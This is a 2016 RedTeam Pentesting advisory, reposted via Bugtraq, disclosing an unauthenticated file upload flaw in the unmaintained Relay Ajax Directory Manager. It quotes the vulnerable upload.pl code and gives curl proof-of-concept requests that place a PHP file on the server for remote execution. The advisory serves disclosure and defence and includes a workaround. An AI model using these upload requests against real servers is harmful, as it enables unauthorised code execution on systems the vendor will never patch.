Bugtraq: [RT-SA-2016-005] Unauthenticated File Upload in Relay Ajax Directory Manager may Lead to Remote Command Execution

Advisory: Unauthenticated File Upload in Relay Ajax Directory Manager

may Lead to Remote Command Execution

A vulnerability within the Relay Ajax Directory Manager web application

allows unauthenticated attackers to upload arbitrary files to the web

server running the web application.

Details

=======

Product: Relay Ajax Directory Manager

Affected Versions: relayb01-071706, 1.5.1, 1.5.3 were tested, other

versions most likely vulnerable as well.

Fixed Versions: -

Vulnerability Type: Unauthenticated File Upload

Security Risk: high

Vendor URL: http://ift.tt/1Pfk2TM

Vendor Status: decided not to fix, project is unmaintained

Advisory URL: http://ift.tt/1sIvGMP

Advisory Status: published

CVE: GENERIC-MAP-NOMATCH

CVE URL: http://ift.tt/1jQGmEN

Introduction

============

Relay Ajax Directory Manager[1], also known as relay[2], is a web-based

file manager. It allows files and folders to be uploaded via drag and

drop and provides several other features, such as a thumbnail preview

for images and basic user authentication functionality.

More Details

============

While the web application itself is mostly written in PHP, it also

utilizes the Perl script 'upload.pl' for handling uploads initiated by

the user.

Uploading is a multi-step process:

1. The user initiates a multipart/form-data upload request through the

web application. This request is sent to the Perl script and the

following steps are handled by it.

2. A temporary file containing the entire request (including

headers) is created. This temporary file is named partly by the first

URL parameter, as shown in the following listing.

3. The headers and the POST body of the request are parsed and filtered

to determine the final filename.

4. The upload is written to the final destination.

5. A file containing statistics about the upload process is written

During steps 2-5, no checks are performed to ensure that the user is

sufficiently authenticated.

The following listing shows parts of the upload Perl script:

-- upload.pl -----------------------------------------------------------

[...]

@qstring=split(/&/,$ENV{'QUERY_STRING'});

$sessionid = $qstring[0];

[...]

$tmpfile = "$uploadsFolder\\temp_$sessionid";

$statsfile = "$uploadsFolder\\stats_$sessionid.txt";

$tmpfilepre= "$uploadsFolder\\$sessionid\_";

[...]

open(FILE,">","$tmpfilepre$filename") or print "can't open temp file";

binmode(FILE);

print FILE $filedata;

close FILE;

[...]

------------------------------------------------------------------------

Here, the first URL parameter is stored in the variable $sessionid. The

content of this variable is then used as a prefix for the filename for

the uploaded data before it ultimately gets written. Given the

configured upload directory, which is 'uploads/' by default, the URL of

the uploaded file can be determined.

The web application usually requires users to be authenticated before

any actions (e.g. uploading) can be performed, but since the Perl script

is not secured by any form of authentication, it can be accessed by

anyone. If the web server does not prohibit the execution of e.g. PHP

files within the upload directory, arbitrary PHP commands can be

executed by uploading the respective files to the web server.

Proof of Concept

================

In general, the Perl script expects a request containing

multipart/form-data. In this case, the name specified in the 'filename'

field is prepended with the first URL parameter. Using the command line

HTTP client curl, a request like the following can be made to a

vulnerable installation of Relay Ajax Directory Manager in order to

upload a PHP script which invokes the function 'phpinfo()':

curl -i -s -k -X 'POST' -H 'Content-Type: multipart/form-data; boundary=----------------------------83ff53821b7c' --data-binary $'------------------------------83ff53821b7c\x0d\x0a'$'Content-Dispositi

on: form-data; filename=\"info.php\"\x0d\x0a'$'Content-Type: application/octet-stream\x0d\x0a\x0d\x0a'$'\x0d\x0a'$'------------------------------83ff53821b7c--' 'http://ift.tt/1XLM9M1'

The server responds with HTTP status code 200 indicating a successful

upload:

HTTP/1.1 200 OK

Date: Mon, 09 May 2016 11:09:50 GMT

Server: Apache/2.4.18 (Debian)

Content-Length: 0

Content-Type: text/plain

Such a request would yield the following files in the web server's

upload directory upon success:

$ ls relay-1-5-3/uploads/

redteam_info.php stats_redteam.txt temp_redteam

The file redteam_info.php contains the multipart/form-data that was

sent to the upload.pl script:

$ cat relay-1-5-3/uploads/temp_redteam.php

Requesting this file with the URL

http://ift.tt/1sIvGwd will then yield

the server's output of the phpinfo() function.

However, since the entire content of the upload request is saved to a

temporary file, a regular POST request containing only the code to be

executed is sufficient to exploit this vulnerability. The following

invocation of curl uploads the same PHP script which invokes the

function 'phpinfo()':

$ curl --silent --include --data '' 'http://ift.tt/1TTSAtJ'

In the server's upload directory, the file temp_redteam.php contains

the data that was sent to the upload.pl script:

$ ls relay-1-5-3/uploads/

stats_redteam.php.txt temp_redteam.php

$ cat temp_redteam.php

Requesting this file with the URL

http://ift.tt/1sIvXz6 will again yield

the server's output of the phpinfo() function.

Using either of these methods, an attacker is able to upload arbitrary

files to the affected web server e.g. in order to easily execute PHP

commands with the privileges of the web server.

Workaround

==========

One possible workaround would be to prevent the execution of files in

the upload directory and deliver them as attachments instead.

Fix

===

None.

Security Risk

=============

This vulnerability allows unauthenticated attackers to upload arbitrary

files to the affected system. In the web server's and project's default

configuration it is very likely that this may be used to execute

arbitrary commands with the privileges of the web server process. This

is possible without authentication, thereby providing no barrier for

attackers. It is therefore rated as a high risk. Since this software is

quite old and not well maintained, it is likely that additional

vulnerabilities exist. However, this was not further evaluated.

Timeline

========

2015-11-19 Vulnerability discovered

2016-04-07 Customer approved disclosure of vulnerability

2016-05-12 Developers contacted, project is no longer maintained

2016-05-31 Advisory published

References

==========

[1] http://ift.tt/1Pfk2TM

[2] http://ift.tt/1pE6Ji8

RedTeam Pentesting GmbH

=======================

RedTeam Pentesting offers individual penetration tests performed by a

team of specialised IT-security experts. Hereby, security weaknesses in

company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to

share its knowledge and enhance the public knowledge with research in

security-related areas. The results are made available as public

security advisories.

More information about RedTeam Pentesting can be found at:

http://ift.tt/1ixScMF

--

RedTeam Pentesting GmbH Tel.: +49 241 510081-0

Dennewartstr. 25-27 Fax : +49 241 510081-99

52068 Aachen http://ift.tt/1ixScMF

Germany Registergericht: Aachen HRB 14004

Geschäftsführer: Patrick Hof, Jens Liebchen

-----BEGIN PGP SIGNATURE-----

Version: GnuPG v2

iQEcBAABCgAGBQJXTXsaAAoJENG/HXWsgFSuDzQIAL7ObaccoLbd5IrHqXnC52BY

ksNZ0opOAQbd42IZQ8o8y9Y762hSDIZtrDmkNVo1UzFC68Fv7fBlG8ERYXuzQRnF

FIlSM5KNmBt/eFV/hc/6qdpzRnLTTq5/x0owqpArNv33i702LeNGOH56a4F3bTt3

T0aaaPbbZ5mXMsZQ3IDNpDjLqutc6Ziz7BvVfyQttT9U6RvSSs54G4deQaGvdn4Y

7qHu3H93nnx0R8naAx5qDqmJwNWEbLKoKDg2kuk9sLlMD/AoXojzD6tavthGmHnL

fatIbeeu9VtXPwpXjGzoSEW9BgjoYqRTRZg9jg4A+xgqbqx34CE+iobgdztZnfQ=

=z9dg

-----END PGP SIGNATURE-----

[ reply ]


from SecurityFocus Vulnerabilities http://ift.tt/1UagkHs